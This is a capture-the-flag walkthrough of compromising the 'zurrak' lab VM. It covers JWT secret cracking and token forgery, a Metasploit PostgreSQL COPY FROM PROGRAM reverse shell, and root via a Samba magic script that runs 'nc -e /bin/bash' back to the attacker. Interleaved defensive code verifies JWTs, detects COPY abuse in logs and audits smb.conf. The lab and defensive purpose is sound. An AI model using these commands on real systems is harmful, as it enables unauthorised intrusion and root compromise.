Difficulty: medium
Kali: 192.168.56.104
Target: 192.168.56.140
Port scan
# nmap -sV -A 192.168.56.140
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-30 16:59 CST
Nmap scan report for 192.168.56.140
Host is up (0.00039s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.57 ((Debian))
|_http-server-header: Apache/2.4.57 (Debian)
| http-title: Login Page
|_Requested resource was login.php
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
5432/tcp open postgresql PostgreSQL DB 9.6.0 or later
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=zurrak
| Subject Alternative Name: DNS:zurrak
| Not valid before: 2023-10-20T19:29:16
|_Not valid after: 2033-10-17T19:29:16
| fingerprint-strings:
| SMBProgNeg:
| SFATAL
| VFATAL
| C0A000
| Munsupported frontend protocol 65363.19778: server supports 3.0 to 3.0
| Fpostmaster.c
| L2195
|_ RProcessStartupPacket
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port5432-TCP:V=7.94SVN%I=7%D=3/30%Time=6607D461%P=x86_64-pc-linux-gnu%r
SF:(SMBProgNeg,8C,"E\0\0\0\x8bSFATAL\0VFATAL\0C0A000\0Munsupported\x20fron
SF:tend\x20protocol\x2065363\.19778:\x20server\x20supports\x203\.0\x20to\x
SF:203\.0\0Fpostmaster\.c\0L2195\0RProcessStartupPacket\0\0");
MAC Address: 08:00:27:62:31:5D (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Host script results:
| smb2-time:
| date: 2024-03-30T16:59:18
|_ start_date: N/A
|_clock-skew: 7h59m58s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
TRACEROUTE
HOP RTT ADDRESS
1 0.39 ms 192.168.56.140
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.05 seconds
Four ports are open: 80, 139, 445 and 5432; there is no 22.
Start with SMB enumeration.
# enum4linux 192.168.56.140
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Mar 30 17:03:12 2024
=========================================( Target Information )=========================================
Target ........... 192.168.56.140
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===========================( Enumerating Workgroup/Domain on 192.168.56.140 )===========================
[E] Can't find workgroup/domain
===============================( Nbtstat Information for 192.168.56.140 )===============================
Looking up status of 192.168.56.140
No reply from 192.168.56.140
==================================( Session Check on 192.168.56.140 )==================================
[E] Server doesn't allow session using username '', password ''. Aborting remainder of tests.
Nothing.
A quick directory scan.
# gobuster dir -u http://192.168.56.140 -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.140
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,txt,php,bak,zip
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/index.php (Status: 302) [Size: 1270] [--> login.php]
/.html (Status: 403) [Size: 279]
/login.php (Status: 200) [Size: 2041]
/admin.php (Status: 302) [Size: 2625] [--> login.php]
/vendor (Status: 301) [Size: 317] [--> http://192.168.56.140/vendor/]
/index_.php (Status: 200) [Size: 200]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
Progress: 346965 / 1323366 (26.22%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 347585 / 1323366 (26.27%)
===============================================================
Finished
===============================================================
We can see login, admin and index_ files, so presumably we need to log in.
Let's look at the web page.
A plain login page; the page source gives the username and password.
username:internal@zurrak.htb && password:testsite
After logging in the page is blank; check the source.
It automatically redirects back to index.php.
Remembering the index_.php found by the directory scan, let's look at it.
At first glance it looks like base64, but it is actually a JWT.
Not sure what it is for yet.
Back on index.php, capturing the request shows a token in the cookie that is also a JWT; decode it.
This one is different: it has an extra isAdmin parameter.
So brute-force the JWT secret with jwt_tools.
The recovered key is TEST123.
Then forge a JWT.
Use this token to access admin.php.
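The token forgery above works because the server signs with a guessable secret (TEST123) and then trusts the isAdmin claim it reads back. The following is an added example, not code from the writeup or from the target application, showing how a server-side verifier should handle the same token: it checks the HS256 signature in constant time before reading any claim, refuses the "none" algorithm, and treats a short dictionary-word secret as unacceptable. The claim names (isAdmin, user) come from the page; the helper names are mine.

```python
import base64
import hashlib
import hmac
import json
import secrets
from typing import Optional

# Secret recovered on the page (weak: short and in every wordlist). Used here only
# to show that the verifier itself is correct and the key is the weak link.
WEAK_KEY = b"TEST123"


def _b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def sign_hs256(claims: dict, key: bytes) -> str:
    """Issue a compact JWT (header.payload.signature) signed with HMAC-SHA256."""
    header = _b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    payload = _b64url_encode(json.dumps(claims).encode())
    sig = hmac.new(key, f"{header}.{payload}".encode("ascii"), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url_encode(sig)}"


def verify_hs256(token: str, key: bytes) -> Optional[dict]:
    """Return the claims only if the signature is valid; otherwise None.

    The claims are decoded *after* the signature check, so a client-supplied
    isAdmin value is never consulted unless the server actually signed it.
    """
    parts = token.split(".")
    if len(parts) != 3:
        return None
    h, p, s = parts
    try:
        header = json.loads(_b64url_decode(h))
        sig = _b64url_decode(s)
    except ValueError:  # bad base64 or bad JSON (binascii.Error is a ValueError)
        return None
    # Pin the algorithm: rejects "alg": "none" and any algorithm-confusion attempt.
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        return None
    expected = hmac.new(key, f"{h}.{p}".encode("ascii"), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, sig):  # constant-time comparison
        return None
    try:
        claims = json.loads(_b64url_decode(p))
    except ValueError:
        return None
    return claims if isinstance(claims, dict) else None


def none_alg_token(claims: dict) -> str:
    """Build an unsigned token (alg=none) so the verifier's rejection can be tested."""
    header = _b64url_encode(json.dumps({"alg": "none", "typ": "JWT"}).encode())
    return f"{header}.{_b64url_encode(json.dumps(claims).encode())}."


def tamper_payload(token: str, claims: dict) -> str:
    """Keep a valid header and signature but swap in different claims."""
    h, _, s = token.split(".")
    return f"{h}.{_b64url_encode(json.dumps(claims).encode())}.{s}"


def key_is_strong(key: bytes) -> bool:
    # RFC 7518 requires an HS256 key of at least 256 bits; anything shorter is
    # within reach of an offline wordlist attack like the one in the writeup.
    return len(key) >= 32


def generate_key() -> bytes:
    return secrets.token_bytes(32)


if __name__ == "__main__":
    good = sign_hs256({"user": "internal@zurrak.htb", "isAdmin": False}, WEAK_KEY)
    print("valid token  ->", verify_hs256(good, WEAK_KEY))
    print("tampered     ->", verify_hs256(tamper_payload(good, {"isAdmin": True}), WEAK_KEY))
    print("wrong key    ->", verify_hs256(sign_hs256({"isAdmin": True}, b"guess"), WEAK_KEY))
    print("alg=none     ->", verify_hs256(none_alg_token({"isAdmin": True}), WEAK_KEY))
    print("weak secret? ->", not key_is_strong(WEAK_KEY))
```

With a 32-byte random secret from generate_key(), the jwt_tools dictionary attack on the page has nothing to find; the verifier is unchanged, which is the point: the application logic was fine, the secret was not.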
please don't ever use these images for file transfers!!!
The steganography hint is thrown right in our face.
An exe file is hidden in the third image.
# stegseek zurrakhearts.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: ""
[i] Original filename: "asli.exe".
[i] Extracting to "zurrakhearts.jpg.out".
Load it into IDA64 and decompile.
Converting the data to a string gives ilovecats.
Now we have a password but no username; guess it is the exe file name, asli.
Try connecting over SMB.
┌──(root㉿kali2)-[~/Desktop]
└─# smbclient //192.168.56.140/share -U asli --password ilovecats
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Oct 21 05:14:00 2023
.. D 0 Sat Oct 21 04:36:51 2023
DONTDELETE D 0 Sat Oct 21 11:44:44 2023
operations D 0 Sat Oct 21 12:04:30 2023
backup.reg N 1792 Sun Jul 24 13:30:09 2011
human_resources D 0 Sun Apr 2 13:30:09 2017
launch_options.txt N 21 Wed Dec 14 11:55:16 2022
9232860 blocks of size 1024. 6208916 blocks available
Connection succeeded (I could not work out the rest on my own and followed a walkthrough, but I am recording it as well).
Download zurrak.old.vmdk from the \operations\New folder\deploy\3\latest\approved directory.
To go from \operations into New folder use cd "New folder"; otherwise the space in the name breaks the command.
┌──(root㉿kali2)-[~/Desktop]
└─# qemu-system-x86_64 -hda zurrak.old.vmdk -display gtk,show-cursor=on
Boot this virtual disk image.
Press c to enter the GRUB command line.
Enter cat (hd0,1)/etc/shadow to see the password hashes for root and postgres.
Damn, I don't know how to get this onto my Kali box; I'll skip that for now and continue.
Crack the root and postgres hashes with john.
The postgres database password turns out to be baller15.
Then use the msf exploit module.
msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > options
Module options (exploit/multi/postgres/postgres_copy_from_program_cmd_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
DATABASE template1 yes The database to authenticate against
DUMP_TABLE_OUTPUT false no select payload command output from table (For Debugging)
PASSWORD baller15 no The password for the specified username. Leave blank for a random password.
RHOSTS 192.168.56.140 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 5432 yes The target port (TCP)
TABLENAME BTgo9XNkX6n yes A table name that does not exist (To avoid deletion)
USERNAME postgres yes The username to authenticate as
Payload options (cmd/unix/reverse_perl):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.56.104 yes The listen address (an interface may be specified)
LPORT 4567 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > run
[-] Handler failed to bind to 192.168.56.104:4567:- -
[-] Handler failed to bind to 0.0.0.0:4567:- -
[-] 192.168.56.140:5432 - Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4567).
[*] Exploit completed, but no session was created.
msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > run
[*] Started reverse TCP handler on 192.168.56.104:4567
[*] 192.168.56.140:5432 - 192.168.56.140:5432 - PostgreSQL 15.3 (Debian 15.3-0+deb12u1) on x86_64-pc-linux-gnu, compiled by gcc (Debian 12.2.0-14) 12.2.0, 64-bit
[*] 192.168.56.140:5432 - Exploiting...
[+] 192.168.56.140:5432 - 192.168.56.140:5432 - BTgo9XNkX6n dropped successfully
[+] 192.168.56.140:5432 - 192.168.56.140:5432 - BTgo9XNkX6n created successfully
[+] 192.168.56.140:5432 - 192.168.56.140:5432 - BTgo9XNkX6n copied successfully(valid syntax/command)
[+] 192.168.56.140:5432 - 192.168.56.140:5432 - BTgo9XNkX6n dropped successfully(Cleaned)
[*] 192.168.56.140:5432 - Exploit Succeeded
[*] Command shell session 1 opened (192.168.56.104:4567 -> 192.168.56.140:54666) at 2024-03-30 18:58:11 +0800
Set PASSWORD, LHOST, LPORT and RHOSTS, then run to get a shell.
I usually have the shell connect back to Kali.
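The module output above shows the whole sequence in one session: a scratch table is dropped, created, used with COPY ... FROM PROGRAM, and dropped again. COPY FROM/TO PROGRAM runs an OS command as the database server's OS user and is only available to superusers or members of pg_execute_server_program, so with log_statement = 'all' it leaves a very clear trace. The following is an added detection example, not part of the writeup or of Metasploit: it scans PostgreSQL log lines for COPY statements that touch programs or server files and flags sessions that show the create/copy/drop scratch-table pattern. The log lines are constructed (the page does not show the module's exact SQL; the command is a placeholder), and the table name, user and database come from the module options on the page.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Set

# Constructed sample lines in PostgreSQL's stderr format with
# log_line_prefix = '%m [%p] %u@%d ' and log_statement = 'all'. Not real logs;
# the COPY command is a placeholder, not the module's payload.
SAMPLE_LOG = """\
2024-03-30 18:58:10.101 CST [1234] postgres@template1 LOG:  statement: DROP TABLE IF EXISTS "BTgo9XNkX6n"
2024-03-30 18:58:10.112 CST [1234] postgres@template1 LOG:  statement: CREATE TABLE "BTgo9XNkX6n"(filename text)
2024-03-30 18:58:10.120 CST [1234] postgres@template1 LOG:  statement: COPY "BTgo9XNkX6n" FROM PROGRAM 'echo PLACEHOLDER_PAYLOAD'
2024-03-30 18:58:10.130 CST [1234] postgres@template1 LOG:  statement: DROP TABLE IF EXISTS "BTgo9XNkX6n"
2024-03-30 19:02:44.005 CST [1301] app@zurrakdb LOG:  statement: SELECT id, name FROM users WHERE id = 7
2024-03-30 19:03:01.200 CST [1302] app@zurrakdb LOG:  statement: COPY users TO '/tmp/users.csv' CSV
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+ \S+) \[(?P<pid>\d+)\] (?P<user>[^@\s]+)@(?P<db>\S+) "
    r"LOG:\s+statement: (?P<sql>.*)$"
)
# COPY ... FROM/TO PROGRAM executes a shell command on the server.
PROGRAM_RE = re.compile(r"\bCOPY\b.*?\b(FROM|TO)\s+PROGRAM\b", re.IGNORECASE)
# COPY ... FROM/TO '<path>' reads or writes a file on the server's filesystem.
FILE_RE = re.compile(r"\bCOPY\b.*?\b(FROM|TO)\s+'", re.IGNORECASE)
CREATE_RE = re.compile(r'\bCREATE\s+TABLE\s+"?(\w+)"?', re.IGNORECASE)
COPY_TARGET_RE = re.compile(r'\bCOPY\s+"?(\w+)"?', re.IGNORECASE)
DROP_RE = re.compile(r'\bDROP\s+TABLE\s+(?:IF\s+EXISTS\s+)?"?(\w+)"?', re.IGNORECASE)


@dataclass
class Finding:
    pid: str
    user: str
    db: str
    rule: str
    severity: str
    sql: str


def scan_postgres_log(text: str) -> List[Finding]:
    """Flag every logged COPY that reaches the OS (program or server file)."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        sql = m.group("sql")
        if PROGRAM_RE.search(sql):
            rule, severity = "copy-program", "critical"
        elif FILE_RE.search(sql):
            rule, severity = "copy-server-file", "high"
        else:
            continue
        findings.append(Finding(m.group("pid"), m.group("user"), m.group("db"), rule, severity, sql))
    return findings


def scratch_table_sessions(text: str) -> Set[str]:
    """Return backend PIDs that created a table, ran COPY ... PROGRAM into it and dropped it.

    This is the create/copy/drop shape visible in the module output on the page;
    a legitimate ETL job rarely drops the table it just loaded in the same session.
    """
    created: Dict[str, Set[str]] = {}
    copied: Dict[str, Set[str]] = {}
    dropped: Dict[str, Set[str]] = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        pid, sql = m.group("pid"), m.group("sql")
        if (c := CREATE_RE.search(sql)):
            created.setdefault(pid, set()).add(c.group(1))
        if PROGRAM_RE.search(sql) and (t := COPY_TARGET_RE.search(sql)):
            copied.setdefault(pid, set()).add(t.group(1))
        if (d := DROP_RE.search(sql)):
            dropped.setdefault(pid, set()).add(d.group(1))
    return {pid for pid, tables in copied.items()
            if tables & created.get(pid, set()) & dropped.get(pid, set())}


if __name__ == "__main__":
    for f in scan_postgres_log(SAMPLE_LOG):
        print(f"[{f.severity}] pid={f.pid} {f.user}@{f.db} {f.rule}: {f.sql}")
    print("scratch-table sessions:", scratch_table_sessions(SAMPLE_LOG))
```

The real fix on the target is not the detector: the database password was reused from a cracked /etc/shadow entry and belonged to a superuser reachable over the network on 5432. Application roles should not be superusers or members of pg_execute_server_program, and pg_hba.conf should not accept password logins for postgres from arbitrary hosts.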
postgres@zurrak:/var/lib/postgresql/15/main$ whoami
postgres
postgres@zurrak:/var/lib/postgresql/15/main$ ls
base pg_multixact pg_stat PG_VERSION postmaster.pid
global pg_notify pg_stat_tmp pg_wal
pg_commit_ts pg_replslot pg_subtrans pg_xact
pg_dynshmem pg_serial pg_tblspc postgresql.auto.conf
pg_logical pg_snapshots pg_twophase postmaster.opts
postgres@zurrak:/var/lib/postgresql/15/main$ cd /home
postgres@zurrak:/home$ ls -al
total 12
drwxr-xr-x 3 root root 4096 Oct 20 19:06 .
drwxr-xr-x 18 root root 4096 Oct 20 15:22 ..
drwxr-xr-x 2 postgres postgres 4096 Oct 24 18:03 postgres
postgres@zurrak:/home$ cd postgres
postgres@zurrak:/home/postgres$ ;s
bash: syntax error near unexpected token `;'
postgres@zurrak:/home/postgres$ ls
emergency.sh user.txt
postgres@zurrak:/home/postgres$ cat user.txt
fe8f97f109ceb0362c95e60338c4c1a8
postgres@zurrak:/home/postgres$
Finally, with some effort, we have the user flag.
There is also an emergency.sh file.
Then upload linpeas and run it.
postgres@zurrak:/home/postgres$ wget http://192.168.56.104:6677/linpeas.sh
--2024-03-30 15:04:13-- http://192.168.56.104:6677/linpeas.sh
Connecting to 192.168.56.104:6677... connected.
HTTP request sent, awaiting response... 200 OK
Length: 828172 (809K) [text/x-sh]
Saving to: ‘linpeas.sh’
linpeas.sh 100%[===================>] 808.76K --.-KB/s in 0.02s
2024-03-30 15:04:13 (51.9 MB/s) - ‘linpeas.sh’ saved [828172/828172]
postgres@zurrak:/home/postgres$ ls
emergency.sh linpeas.sh user.txt
postgres@zurrak:/home/postgres$ chmod +x linpeas.sh
postgres@zurrak:/home/postgres$ ./linpeas.sh
╔══════════╣ Unmounted file-system?
╚ Check if you can mount umounted devices
UUID=86e74abe-2367-4664-8041-b897fb803a6d / ext4 errors=remount-ro 0 1
UUID=68b2a8a8-27f9-4255-9e14-180abd1261c4 none swap sw 0 0
/dev/sr0 /media/cdrom0 udf,iso9660 user,noauto 0 0
//127.0.0.1/internal uid=emre, pw=daily666
A local SMB mount is found.
Look at the Samba configuration file.
# cat /etc/samba/smb.conf
...
[ipc$]
hosts allow = 127.0.0.1
hosts deny = 0.0.0.0/0
guest ok = no
browseable = no
[share]
comment = "zurrak operations share"
path = /opt/smbshare
hosts allow = 0.0.0.0/0
guest ok = no
browseable = yes
writable = no
valid users = emre, asli
[internal]
comment = "zurrak internal share"
path = /opt/internal
hosts allow = 127.0.0.1
guest ok = no
browseable = yes
writable = yes
valid users = emre
create mask = 0777
directory mask = 0777
force user = root
magic script = emergency.sh
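Three settings in the [internal] share combine into the privilege escalation: the share is writable, every operation runs as root (force user = root), and Samba executes any uploaded file named emergency.sh (magic script). Each alone is a finding; together they hand root to anyone who knows emre's password, which is sitting in clear text in the mount line linpeas printed. The following is an added audit example, not code from the writeup or from Samba: it parses smb.conf share sections and reports these combinations. The sample configuration is the one shown above (the [global] section is not on the page and is omitted); the rule names are mine.

```python
import configparser
from dataclasses import dataclass
from typing import List

# Share definitions reproduced from the writeup's /etc/samba/smb.conf; the
# [global] section is not shown on the page and is omitted here.
SAMPLE_SMB_CONF = """\
[ipc$]
hosts allow = 127.0.0.1
hosts deny = 0.0.0.0/0
guest ok = no
browseable = no

[share]
comment = "zurrak operations share"
path = /opt/smbshare
hosts allow = 0.0.0.0/0
guest ok = no
browseable = yes
writable = no
valid users = emre, asli

[internal]
comment = "zurrak internal share"
path = /opt/internal
hosts allow = 127.0.0.1
guest ok = no
browseable = yes
writable = yes
valid users = emre
create mask = 0777
directory mask = 0777
force user = root
magic script = emergency.sh
"""

SEVERITY_ORDER = {"info": 0, "medium": 1, "high": 2, "critical": 3}


@dataclass
class Finding:
    share: str
    rule: str
    severity: str
    detail: str


def _truthy(value: str) -> bool:
    # Samba accepts yes/true/1 (case-insensitive) for boolean parameters.
    return value.strip().lower() in ("yes", "true", "1")


def _is_writable(section) -> bool:
    # "read only" is the inverse of "writable"/"writeable"/"write ok".
    if "read only" in section:
        return not _truthy(section["read only"])
    return _truthy(section.get("writable", section.get("writeable", section.get("write ok", "no"))))


def audit_smb_conf(text: str) -> List[Finding]:
    """Walk every share section and report risky parameter combinations."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    findings: List[Finding] = []
    for name in cp.sections():
        if name.lower() == "global":
            continue
        s = cp[name]
        writable = _is_writable(s)
        magic = s.get("magic script", "").strip()
        force_user = s.get("force user", "").strip()
        if magic:
            # An uploaded file with this name is executed server-side; if the
            # share is writable, any valid user can trigger it.
            who = f" as {force_user}" if force_user else ""
            findings.append(Finding(name, "magic-script", "critical" if writable else "high",
                                    f"uploading a file named {magic!r} executes it on the server{who}"))
        if force_user == "root":
            findings.append(Finding(name, "force-user-root", "high",
                                    "all file operations on this share run as root"))
        if "0777" in (s.get("create mask", ""), s.get("directory mask", "")):
            findings.append(Finding(name, "permissive-mask", "medium",
                                    "new files or directories are created world-writable"))
        if _truthy(s.get("guest ok", "no")):
            findings.append(Finding(name, "guest-access", "medium", "unauthenticated access allowed"))
        if writable and s.get("hosts allow", "").strip() == "0.0.0.0/0":
            findings.append(Finding(name, "writable-from-anywhere", "medium",
                                    "writable share reachable from any address"))
    return findings


def worst_severity(findings: List[Finding]) -> str:
    return max((f.severity for f in findings), key=SEVERITY_ORDER.get, default="none")


if __name__ == "__main__":
    results = audit_smb_conf(SAMPLE_SMB_CONF)
    for f in results:
        print(f"[{f.severity}] [{f.share}] {f.rule}: {f.detail}")
    print("worst:", worst_severity(results))
```

On this configuration only [internal] produces findings; [share] is read-only, so its hosts allow = 0.0.0.0/0 is not flagged by itself. The remediation is to drop magic script (it has no place on a production share), drop force user = root, and move the uid=/pw= mount options into a credentials= file readable only by root.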
The SMB share on 127.0.0.1 executes the emergency.sh script, so we hijack it and get a reverse shell.
postgres@zurrak:/home/postgres$ cat emergency.sh
#!/bin/bash
nc -e /bin/bash 192.168.56.104 4444
#smbclient \\\\127.0.0.1/internal -U emre%daily666 -c "put emergency.sh"
# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.56.104] from (UNKNOWN) [192.168.56.140] 40948
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
ls
bash_history
root.txt
cat root.txt
66fce7650a88ac2afd99d061e1c6a4df
Following along step by step, I got root as well. Medium... ugh, I'm still too much of a noob.